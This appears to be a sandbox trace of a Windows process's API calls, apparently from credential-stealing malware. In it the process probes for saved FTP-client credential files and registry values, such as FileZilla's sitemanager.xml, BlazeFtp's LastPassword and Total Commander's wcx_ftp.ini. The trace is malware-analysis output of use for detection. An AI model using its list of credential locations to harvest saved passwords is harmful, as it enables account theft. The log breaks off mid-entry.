0x75db0000 [0314.310] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0314.310] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f58) returned 0x79b318 [0314.311] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.311] wvsprintfW (in: param_1=0x79b318, param_2="%s\\Cyberduck", arglist=0x19fb88 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cyberduck") returned 47 [0314.311] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x62) returned 0x798dd8 [0314.312] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.312] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.312] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cyberduck") returned 0 [0314.313] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.313] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.313] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.315] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.316] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0314.316] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x79b318 [0314.317] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.318] wvsprintfW (in: param_1=0x79b318, param_2="%s\\iterate_GmbH", arglist=0x19fb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\iterate_GmbH") returned 50 [0314.318] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x68) returned 0x798dd8 [0314.319] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.319] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.320] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\iterate_GmbH") returned 0 [0314.320] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.320] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.321] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.321] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.322] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0314.334] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x79b318 [0314.335] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.335] wvsprintfW (in: param_1=0x79b318, param_2="%s\\.config\\fullsync\\profiles.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\.config\\fullsync\\profiles.xml") returned 51 [0314.336] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x6a) returned 0x798dd8 [0314.336] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.337] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.337] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\.config\\fullsync\\profiles.xml") returned 0 [0314.337] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.338] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.338] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f72) returned 0x79b318 [0314.338] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.339] wvsprintfW (in: param_1=0x79b318, param_2="%s\\FTPInfo\\ServerList.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.xml") returned 60 [0314.340] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7c) returned 0x798dd8 [0314.340] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.340] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.341] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.xml") returned 0 [0314.341] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.341] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f72) returned 0x79b318 [0314.342] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.342] wvsprintfW (in: param_1=0x79b318, param_2="%s\\FTPInfo\\ServerList.cfg", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.cfg") returned 60 [0314.342] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7c) returned 0x798dd8 [0314.343] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.343] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.344] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.cfg") returned 0 [0314.344] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.344] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3e8) returned 0x79a2e8 [0314.344] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x78b520 [0314.344] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x794b68 [0314.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.345] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\LinasFTP\\Site Manager", phkResult=0x794b68 | out: phkResult=0x794b68*=0x0) returned 0x2 [0314.345] GetProcessHeap () returned 0x780000 [0314.345] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x794b68 | out: hHeap=0x780000) returned 1 [0314.345] GetProcessHeap () returned 0x780000 [0314.346] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.346] GetProcessHeap () returned 0x780000 [0314.346] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b520 | out: hHeap=0x780000) returned 1 [0314.346] GetProcessHeap () returned 0x780000 [0314.346] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.347] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.347] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0314.347] GetProcessHeap () returned 0x780000 [0314.347] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f74) returned 0x79b318 [0314.348] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.349] wvsprintfW (in: param_1=0x79b318, param_2="%s\\FileZilla\\Filezilla.xml", arglist=0x19fb9c | out: param_1="C:\\Program Files (x86)\\FileZilla\\Filezilla.xml") returned 46 [0314.349] GetProcessHeap () returned 0x780000 [0314.349] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x60) returned 0x798dd8 [0314.349] GetProcessHeap () returned 0x780000 [0314.349] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.350] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.350] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FileZilla\\Filezilla.xml") returned 0 [0314.350] GetProcessHeap () returned 0x780000 [0314.350] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.350] GetProcessHeap () returned 0x780000 [0314.351] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.351] GetProcessHeap () returned 0x780000 [0314.351] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f74) returned 0x79b318 [0314.351] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.352] wvsprintfW (in: param_1=0x79b318, param_2="%s\\FileZilla\\filezilla.xml", arglist=0x19fb90 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\filezilla.xml") returned 61 [0314.352] GetProcessHeap () returned 0x780000 [0314.352] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7e) returned 0x798dd8 [0314.352] GetProcessHeap () returned 0x780000 [0314.353] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.353] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.354] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\filezilla.xml") returned 0 [0314.354] GetProcessHeap () returned 0x780000 [0314.354] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.354] GetProcessHeap () returned 0x780000 [0314.354] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f7c) returned 0x79b318 [0314.355] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.356] wvsprintfW (in: param_1=0x79b318, param_2="%s\\FileZilla\\recentservers.xml", arglist=0x19fb84 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml") returned 65 [0314.356] GetProcessHeap () returned 0x780000 [0314.356] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x86) returned 0x79a2e8 [0314.356] GetProcessHeap () returned 0x780000 [0314.357] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.357] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.357] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml") returned 0 [0314.358] GetProcessHeap () returned 0x780000 [0314.358] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.358] GetProcessHeap () returned 0x780000 [0314.358] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f78) returned 0x79b318 [0314.359] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.359] wvsprintfW (in: param_1=0x79b318, param_2="%s\\FileZilla\\sitemanager.xml", arglist=0x19fb78 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\sitemanager.xml") returned 63 [0314.359] GetProcessHeap () returned 0x780000 [0314.359] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x82) returned 0x79a2e8 [0314.360] GetProcessHeap () returned 0x780000 [0314.360] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.361] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.361] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\sitemanager.xml") returned 0 [0314.361] GetProcessHeap () returned 0x780000 [0314.361] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.361] GetProcessHeap () returned 0x780000 [0314.361] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.362] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.362] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0314.363] GetProcessHeap () returned 0x780000 [0314.363] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6c) returned 0x79b318 [0314.363] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.364] wvsprintfW (in: param_1=0x79b318, param_2="%s\\Staff-FTP\\sites.ini", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Staff-FTP\\sites.ini") returned 42 [0314.364] GetProcessHeap () returned 0x780000 [0314.364] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x58) returned 0x798dd8 [0314.364] GetProcessHeap () returned 0x780000 [0314.364] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.365] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Staff-FTP\\sites.ini") returned 0 [0314.366] GetProcessHeap () returned 0x780000 [0314.366] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.366] GetProcessHeap () returned 0x780000 [0314.366] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.366] GetProcessHeap () returned 0x780000 [0314.366] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f68) returned 0x79b318 [0314.367] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.368] wvsprintfW (in: param_1=0x79b318, param_2="%s\\BlazeFtp\\site.dat", arglist=0x19fb3c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BlazeFtp\\site.dat") returned 55 [0314.368] GetProcessHeap () returned 0x780000 [0314.368] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x72) returned 0x797890 [0314.368] GetProcessHeap () returned 0x780000 [0314.368] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.369] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BlazeFtp\\site.dat") returned 0 [0314.369] GetProcessHeap () returned 0x780000 [0314.369] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x797890 | out: hHeap=0x780000) returned 1 [0314.369] GetProcessHeap () returned 0x780000 [0314.369] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79a2e8 [0314.385] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.385] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\FlashPeak\\BlazeFtp\\Settings", pszValue="LastPassword", pdwType=0x0, pvData=0x79a2e8, pcbData=0x19fb3c*=0x104 | out: pdwType=0x0, pvData=0x79a2e8, pcbData=0x19fb3c*=0x104) returned 0x2 [0314.386] GetProcessHeap () returned 0x780000 [0314.387] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.387] GetProcessHeap () returned 0x780000 [0314.387] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.387] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.388] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0314.388] GetProcessHeap () returned 0x780000 [0314.388] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x79b318 [0314.389] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.389] wvsprintfW (in: param_1=0x79b318, param_2="%s\\Fastream NETFile\\My FTP Links", arglist=0x19fb94 | out: param_1="C:\\Program Files (x86)\\Fastream NETFile\\My FTP Links") returned 52 [0314.389] GetProcessHeap () returned 0x780000 [0314.389] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x6c) returned 0x798dd8 [0314.389] GetProcessHeap () returned 0x780000 [0314.390] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.391] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.391] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Fastream NETFile\\My FTP Links") returned 0 [0314.391] GetProcessHeap () returned 0x780000 [0314.392] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.392] GetProcessHeap () returned 0x780000 [0314.392] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.392] GetProcessHeap () returned 0x780000 [0314.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.393] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.393] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0314.393] GetProcessHeap () returned 0x780000 [0314.393] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f82) returned 0x79b318 [0314.394] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.394] wvsprintfW (in: param_1=0x79b318, param_2="%s\\GoFTP\\settings\\Connections.txt", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\GoFTP\\settings\\Connections.txt") returned 53 [0314.394] GetProcessHeap () returned 0x780000 [0314.394] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x6e) returned 0x798dd8 [0314.394] GetProcessHeap () returned 0x780000 [0314.395] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.395] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.396] PathFileExistsW (pszPath="C:\\Program Files (x86)\\GoFTP\\settings\\Connections.txt") returned 0 [0314.396] GetProcessHeap () returned 0x780000 [0314.396] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.396] GetProcessHeap () returned 0x780000 [0314.397] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.397] GetProcessHeap () returned 0x780000 [0314.397] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f76) returned 0x79b318 [0314.397] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.398] wvsprintfW (in: param_1=0x79b318, param_2="%s\\Estsoft\\ALFTP\\ESTdb2.dat", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat") returned 62 [0314.398] GetProcessHeap () returned 0x780000 [0314.398] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x80) returned 0x798dd8 [0314.398] GetProcessHeap () returned 0x780000 [0314.398] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.399] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat") returned 0 [0314.399] GetProcessHeap () returned 0x780000 [0314.400] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.400] GetProcessHeap () returned 0x780000 [0314.400] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.400] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.401] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0314.401] GetProcessHeap () returned 0x780000 [0314.401] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6c) returned 0x79b318 [0314.402] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.402] wvsprintfW (in: param_1=0x79b318, param_2="%s\\DeluxeFTP\\sites.xml", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\DeluxeFTP\\sites.xml") returned 42 [0314.402] GetProcessHeap () returned 0x780000 [0314.402] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x58) returned 0x798dd8 [0314.402] GetProcessHeap () returned 0x780000 [0314.403] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.404] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.404] PathFileExistsW (pszPath="C:\\Program Files (x86)\\DeluxeFTP\\sites.xml") returned 0 [0314.404] GetProcessHeap () returned 0x780000 [0314.404] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.404] GetProcessHeap () returned 0x780000 [0314.405] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.405] GetProcessHeap () returned 0x780000 [0314.405] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.405] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.406] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Windows") returned 0x0 [0314.406] GetProcessHeap () returned 0x780000 [0314.406] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5c) returned 0x79b318 [0314.407] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.407] wvsprintfW (in: param_1=0x79b318, param_2="%s\\wcx_ftp.ini", arglist=0x19fb98 | out: param_1="C:\\Windows\\wcx_ftp.ini") returned 22 [0314.407] GetProcessHeap () returned 0x780000 [0314.407] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x30) returned 0x796af8 [0314.407] GetProcessHeap () returned 0x780000 [0314.408] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.409] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.409] PathFileExistsW (pszPath="C:\\Windows\\wcx_ftp.ini") returned 0 [0314.410] GetProcessHeap () returned 0x780000 [0314.410] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x796af8 | out: hHeap=0x780000) returned 1 [0314.410] GetProcessHeap () returned 0x780000 [0314.410] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.410] GetProcessHeap () returned 0x780000 [0314.410] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5c) returned 0x79b318 [0314.411] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.412] wvsprintfW (in: param_1=0x79b318, param_2="%s\\wcx_ftp.ini", arglist=0x19fb8c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 49 [0314.412] GetProcessHeap () returned 0x780000 [0314.413] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x66) returned 0x798dd8 [0314.413] GetProcessHeap () returned 0x780000 [0314.413] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.414] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.414] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 0 [0314.415] GetProcessHeap () returned 0x780000 [0314.415] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.415] GetProcessHeap () returned 0x780000 [0314.415] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.416] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.429] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0314.429] GetProcessHeap () returned 0x780000 [0314.429] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5c) returned 0x79b318 [0314.429] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.430] wvsprintfW (in: param_1=0x79b318, param_2="%s\\wcx_ftp.ini", arglist=0x19fb80 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 33 [0314.430] GetProcessHeap () returned 0x780000 [0314.430] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x46) returned 0x79af48 [0314.430] GetProcessHeap () returned 0x780000 [0314.431] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.431] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.431] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 0 [0314.432] GetProcessHeap () returned 0x780000 [0314.432] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79af48 | out: hHeap=0x780000) returned 1 [0314.432] GetProcessHeap () returned 0x780000 [0314.432] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.434] GetProcessHeap () returned 0x780000 [0314.434] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6c) returned 0x79b318 [0314.435] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.436] wvsprintfW (in: param_1=0x79b318, param_2="%s\\GHISLER\\wcx_ftp.ini", arglist=0x19fb74 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 57 [0314.436] GetProcessHeap () returned 0x780000 [0314.436] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x76) returned 0x797510 [0314.436] GetProcessHeap () returned 0x780000 [0314.437] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.438] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.438] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 0 [0314.439] GetProcessHeap () returned 0x780000 [0314.439] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x797510 | out: hHeap=0x780000) returned 1 [0314.439] GetProcessHeap () returned 0x780000 [0314.439] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79a2e8 [0314.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.440] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Ghisler\\Total Commander", pszValue="FtpIniName", pdwType=0x0, pvData=0x79a2e8, pcbData=0x19fb74*=0x104 | out: pdwType=0x0, pvData=0x79a2e8, pcbData=0x19fb74*=0x104) returned 0x2 [0314.440] GetProcessHeap () returned 0x780000 [0314.440] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.440] GetProcessHeap () returned 0x780000 [0314.441] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.441] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.442] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0314.442] GetProcessHeap () returned 0x780000 [0314.442] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.443] wvsprintfW (in: param_1=0x79b318, param_2="%s\\FTPGetter\\Profile\\servers.xml", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml") returned 52 [0314.443] 